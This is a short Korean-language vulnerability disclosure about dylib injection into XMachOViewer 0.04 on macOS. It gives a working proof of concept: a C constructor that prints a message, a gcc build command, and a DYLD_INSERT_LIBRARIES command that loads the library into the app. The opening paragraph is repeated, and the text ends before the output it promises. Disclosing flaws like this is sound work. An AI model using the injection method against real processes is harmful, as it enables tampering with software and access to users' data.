
XMachOViewer 0.04의 dylib 주입 취약점으로 인해 공격자가 무결성을 손상시킬 수 있습니다. 이를 악용하면 제품 프로세스에 승인되지 않은 코드가 주입될 수 있으며, 잠재적으로 원격 제어 및 민감한 사용자 데이터에 대한 무단 액세스로 이어질 수 있습니다.
XMachOViewer 0.04의 dylib 주입 취약점으로 인해 공격자가 무결성을 손상시킬 수 있습니다. 이를 악용하면 제품의 프로세스에 무단 코드가 주입되어 원격 제어 및 민감한 사용자 데이터에 대한 무단 액세스로 이어질 수 있습니다.

macOS용 휴대용 버전
#include <syslog.h>
#include <stdio.h>
__attribute__((constructor))
static void poc(void)
{
printf("Malicious Dylib Inserted");
}
컴파일합니다.
gcc -dynamiclib -arch x86_64 -o poc.dylib poc.c
그리고 주입합니다:
DYLD_INSERT_LIBRARIES=poc.dylib /Applications/XMachOViewer.app/Contents/MacOS/XMachOViewer
이렇게 하면 애플리케이션이 열리면서 dylib이 실행됩니다. 애플리케이션을 종료하면 터미널에서 다음을 확인할 수 있습니다.
